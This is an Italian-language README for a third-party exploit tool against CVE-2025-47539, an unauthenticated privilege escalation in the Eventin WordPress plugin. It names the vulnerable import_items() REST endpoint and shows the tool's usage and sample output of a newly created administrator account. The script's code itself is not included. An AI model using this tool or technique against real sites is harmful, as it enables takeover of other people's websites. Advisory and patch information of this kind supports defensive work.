
Eventin <= 4.0.26 - Autorizzazione mancante per Escalation dei Privilegi non autenticata
Il plugin Event Manager, Events Calendar, Tickets, Registrations – Eventin per WordPress è vulnerabile a escalation di privilegi non autenticata a causa di un controllo di autorizzazione mancante nella funzione import_items().
<= 4.0.26CVE-2025-475399.8 (Critica)7 Maggio 202515 Maggio 2025Attaccanti non autenticati possono creare una richiesta malevola all'API REST e creare un nuovo utente con privilegi administrator senza alcuna interazione da parte dell'utente.
Questo script Python è uno strumento di sfruttamento autonomo per CVE-2025-47539.
Esegue:
⚠️ Questo script è destinato esclusivamente a uso educativo e valutazioni di sicurezza professionali.
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
Più di 10.000+ siti WordPress sono confermati vulnerabili a questo exploit.
Tutti gli amministratori di siti che utilizzano Eventin ≤ 4.0.26 dovrebbero aggiornare immediatamente alla versione 4.0.28 o successiva.
Questo strumento è fornito esclusivamente per scopi educativi e di test di penetrazione autorizzati.
Il creatore non è responsabile per qualsiasi uso improprio o danno causato da questo script.
Di: Nxploited ( Khaled_Alenazi )
📧 Contatto: [email protected]